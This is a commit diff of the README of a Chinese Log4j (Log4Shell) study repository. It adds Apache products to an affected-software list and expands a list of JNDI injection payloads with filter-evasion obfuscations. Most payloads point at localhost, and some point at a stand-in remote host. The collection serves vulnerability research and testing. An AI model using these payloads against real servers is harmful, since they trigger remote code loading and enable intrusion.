|
1 | 1 | # HackLog4j-永恒之恶龙 |
2 | 2 |
|
3 | | -本项目用来致敬全宇宙最无敌的Java日志库!同时也记录自己在学习Log4j漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2021年12月10日,最近的一次更新时间为2021年12月19日。作者:[0e0w](https://github.com/0e0w/HackLog4j) |
| 3 | +本项目用来致敬全宇宙最无敌的Java日志库!同时也记录自己在学习Log4j漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2021年12月10日,最近的一次更新时间为2021年12月20日。作者:[0e0w](https://github.com/0e0w/HackLog4j) |
4 | 4 |
|
5 | 5 | - [01-Log4j基础知识](https://github.com/0e0w/HackLog4j#01-log4j%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86) |
6 | 6 | - [02-Log4j框架识别](https://github.com/0e0w/HackLog4j#02-log4j%E6%A1%86%E6%9E%B6%E8%AF%86%E5%88%AB) |
|
24 | 24 |
|
25 | 25 | - [ ] Apache Flink |
26 | 26 | - [ ] Apache Struts2 |
| 27 | +- [ ] Apache Spark |
| 28 | +- [ ] Apache Tomcat |
27 | 29 | - [x] Apache Solr |
| 30 | +- [ ] Apache Dubbo |
| 31 | +- [ ] Apache Druid |
28 | 32 | - [ ] flume |
29 | | -- [ ] dubbo |
30 | | -- [ ] Druid |
31 | 33 | - [ ] Redis |
32 | 34 | - [ ] logstash |
33 | 35 | - [ ] ElasticSearch |
34 | 36 | - [ ] kafka |
35 | 37 | - [ ] ghidra |
36 | 38 | - [ ] Spring-Boot-strater-log4j2 |
37 | 39 | - [ ] VMware vCenter |
38 | | -- [ ] 我的世界(Minecraft) |
| 40 | +- [ ] Minecraft |
| 41 | +- [ ] Logstash |
39 | 42 | - ...... |
40 | 43 | - https://github.com/cisagov/log4j-affected-db |
41 | 44 | - https://github.com/YfryTchsGD/Log4jAttackSurface |
@@ -67,25 +70,36 @@ ${${lower:jndi}:${lower:rmi}://127.0.0.1/poc} |
67 | 70 | ${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc} |
68 | 71 | ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://127.0.0.1/poc} |
69 | 72 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://127.0.0.1/poc} |
70 | | -${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc} |
71 | | -${${::-j}ndi:rmi://127.0.0.1/poc} |
72 | | -${${lower:jndi}:${lower:rmi}://127.0.0.1/poc} |
73 | | -${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc} |
74 | | -${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://127.0.0.1/poc} |
75 | | -${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://127.0.0.1/poc} |
76 | 73 | ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}}://127.0.0.1/poc} |
77 | 74 | ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc} |
78 | 75 | $%7Bjndi:ldap://127.0.0.1/poc%7D |
79 | 76 | ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}127.0.0.1/poc} |
80 | 77 | ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1/poc} |
81 | 78 | ${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc} |
82 | 79 | ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc} |
83 | | -${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc} |
84 | 80 | ${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}127.0.0.1/poc} |
85 | 81 | ${jndi:${lower:l}${lower:d}ap://127.0.0.1/poc} |
86 | | -${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc} |
87 | 82 | ${jndi:ldap://127.0.0.1#127.0.0.1/poc} |
| 83 | +${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://k123.k123.k123/poc} |
| 84 | +${${::-j}ndi:rmi://k123.k123.k123/ass} |
| 85 | +${jndi:rmi://k8.k123.k123} |
| 86 | +${${lower:jndi}:${lower:rmi}://k8.k123.k123/poc} |
| 87 | +${${lower:${lower:jndi}}:${lower:rmi}://k8.k123.k123/poc} |
| 88 | +${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://k8.k123.k123/poc} |
88 | 89 | j${loWer:Nd}i${uPper::} |
| 90 | +${jndi:ldaps://127.0.0.1/poc} |
| 91 | +${jndi:iiop://127.0.0.1/poc} |
| 92 | +${date:ldap://127.0.0.1/poc} |
| 93 | +${java:ldap://127.0.0.1/poc} |
| 94 | +${marker:ldap://127.0.0.1/poc} |
| 95 | +${ctx:ldap://127.0.0.1/poc} |
| 96 | +${lower:ldap://127.0.0.1/poc} |
| 97 | +${upper:ldap://127.0.0.1/poc} |
| 98 | +${main:ldap://127.0.0.1/poc} |
| 99 | +${jvmrunargs:ldap://127.0.0.1/poc} |
| 100 | +${sys:ldap://127.0.0.1/poc} |
| 101 | +${env:ldap://127.0.0.1/poc} |
| 102 | +${log4j:ldap://127.0.0.1/poc} |
89 | 103 | ``` |
90 | 104 |
|
91 | 105 | - https://github.com/fullhunt/log4j-scan |
|
0 commit comments